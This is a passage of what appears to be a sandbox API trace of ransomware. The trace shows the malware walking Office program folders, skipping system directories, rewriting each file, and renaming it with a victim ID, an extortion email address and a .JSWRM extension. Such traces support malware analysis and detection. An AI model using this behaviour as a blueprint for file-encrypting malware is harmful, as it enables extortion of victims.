hTemplateFile=0x0) returned 0x238 [0140.903] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4608) returned 1 [0140.903] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1200) returned 0x27b348 [0140.903] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1200, lpOverlapped=0x0) returned 1 [0140.905] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.905] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1200, lpOverlapped=0x0) returned 1 [0140.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0140.905] CloseHandle (hObject=0x238) returned 1 [0140.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0140.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0140.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0140.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0140.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0140.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0140.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0140.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0140.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0140.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0140.906] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGACCBOX.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgaccbox.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGACCBOX.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgaccbox.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0140.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0140.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0140.907] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc7288ca, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc7288ca, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x34e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGACCBOX.XML", cAlternateFileName="")) returned 1 [0140.907] lstrcmpiW (lpString1="DGACCBOX.XML", lpString2=".") returned 1 [0140.907] lstrcmpiW (lpString1="DGACCBOX.XML", lpString2="..") returned 1 [0140.907] lstrcmpiW (lpString1="DGACCBOX.XML", lpString2="...") returned 1 [0140.907] lstrcmpiW (lpString1="DGACCBOX.XML", lpString2="windows") returned -1 [0140.907] lstrcmpiW (lpString1="DGACCBOX.XML", lpString2="recovery") returned -1 [0140.907] lstrcmpiW (lpString1="DGACCBOX.XML", lpString2="perflogs") returned -1 [0140.907] lstrcmpiW (lpString1="DGACCBOX.XML", lpString2="documents and settings") returned -1 [0140.907] lstrcmpiW (lpString1="DGACCBOX.XML", lpString2="$RECYCLE.BIN") returned 1 [0140.907] lstrcmpiW (lpString1="DGACCBOX.XML", lpString2="system volume information") returned -1 [0140.907] lstrcmpiW (lpString1="DGACCBOX.XML", lpString2="msocache") returned -1 [0140.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0140.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGACCBOX.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.907] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGACCBOX.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGACCBOX.XML", lpUsedDefaultChar=0x0) returned 12 [0140.907] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0140.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0140.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGACCBOX.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0140.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGACCBOX.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGACCBOX.XML", lpUsedDefaultChar=0x0) returned 12 [0140.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0140.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0140.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0140.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.908] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0140.908] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGACCBOX.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgaccbox.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.908] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=846) returned 1 [0140.909] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x340) returned 0x20e550 [0140.909] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x340, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x340, lpOverlapped=0x0) returned 1 [0140.910] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.910] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x340, lpOverlapped=0x0) returned 1 [0140.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0140.910] CloseHandle (hObject=0x238) returned 1 [0140.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0140.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0140.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0140.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0140.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0140.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0140.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0140.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0140.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0140.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0140.911] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGACCBOX.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgaccbox.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGACCBOX.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgaccbox.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0140.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0140.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0140.912] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x219bb1e1, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x219bb1e1, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x219bb1e1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4b2c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGAD.DPV", cAlternateFileName="")) returned 1 [0140.912] lstrcmpiW (lpString1="DGAD.DPV", lpString2=".") returned 1 [0140.912] lstrcmpiW (lpString1="DGAD.DPV", lpString2="..") returned 1 [0140.912] lstrcmpiW (lpString1="DGAD.DPV", lpString2="...") returned 1 [0140.912] lstrcmpiW (lpString1="DGAD.DPV", lpString2="windows") returned -1 [0140.912] lstrcmpiW (lpString1="DGAD.DPV", lpString2="recovery") returned -1 [0140.912] lstrcmpiW (lpString1="DGAD.DPV", lpString2="perflogs") returned -1 [0140.912] lstrcmpiW (lpString1="DGAD.DPV", lpString2="documents and settings") returned -1 [0140.912] lstrcmpiW (lpString1="DGAD.DPV", lpString2="$RECYCLE.BIN") returned 1 [0140.912] lstrcmpiW (lpString1="DGAD.DPV", lpString2="system volume information") returned -1 [0140.912] lstrcmpiW (lpString1="DGAD.DPV", lpString2="msocache") returned -1 [0140.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0140.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGAD.DPV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0140.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGAD.DPV", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGAD.DPV", lpUsedDefaultChar=0x0) returned 8 [0140.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0140.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0140.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGAD.DPV", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0140.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGAD.DPV", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGAD.DPV", lpUsedDefaultChar=0x0) returned 8 [0140.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0140.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0140.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0140.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0140.913] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGAD.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgad.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.913] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19244) returned 1 [0140.913] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4b20) returned 0x27b348 [0140.913] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4b20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x4b20, lpOverlapped=0x0) returned 1 [0140.920] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.920] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4b20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x4b20, lpOverlapped=0x0) returned 1 [0140.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0140.920] CloseHandle (hObject=0x238) returned 1 [0140.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0140.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0140.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0140.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0140.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0140.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0140.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0140.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0140.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0140.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0140.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0140.921] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0140.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0140.921] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0140.921] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGAD.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgad.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGAD.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgad.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0140.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0140.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0140.922] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0140.922] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcc702687, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcc702687, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcc7288ca, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3be, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="DGAD.XML", cAlternateFileName="")) returned 1 [0140.922] lstrcmpiW (lpString1="DGAD.XML", lpString2=".") returned 1 [0140.922] lstrcmpiW (lpString1="DGAD.XML", lpString2="..") returned 1 [0140.922] lstrcmpiW (lpString1="DGAD.XML", lpString2="...") returned 1 [0140.922] lstrcmpiW (lpString1="DGAD.XML", lpString2="windows") returned -1 [0140.922] lstrcmpiW (lpString1="DGAD.XML", lpString2="recovery") returned -1 [0140.922] lstrcmpiW (lpString1="DGAD.XML", lpString2="perflogs") returned -1 [0140.922] lstrcmpiW (lpString1="DGAD.XML", lpString2="documents and settings") returned -1 [0140.922] lstrcmpiW (lpString1="DGAD.XML", lpString2="$RECYCLE.BIN") returned 1 [0140.922] lstrcmpiW (lpString1="DGAD.XML", lpString2="system volume information") returned -1 [0140.922] lstrcmpiW (lpString1="DGAD.XML", lpString2="msocache") returned -1 [0140.922] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0140.922] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGAD.XML", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0140.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGAD.XML", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGAD.XML", lpUsedDefaultChar=0x0) returned 8 [0140.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0140.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0140.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGAD.XML", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0140.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DGAD.XML", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DGAD.XML", lpUsedDefaultChar=0x0) returned 8 [0140.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0140.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0140.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0140.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0140.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0140.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0140.923] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\DGAD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\dgad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0140.924] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=958) returned 1 [0140.924] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.924] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3b0) returned 0x20b1f8 [0140.924] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x3b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x3b0, lpOverlapped=0x0) returned 1 [0140.926] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.926] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x3b0, lpOverlapped=0x0) returned 1 [0140.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0140.926] CloseHandle (hObject=0x238) returned 1 [0140.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0140.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0140.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0140.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0140.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0140.926] HeapFree (in: hHeap=0x1e0000, 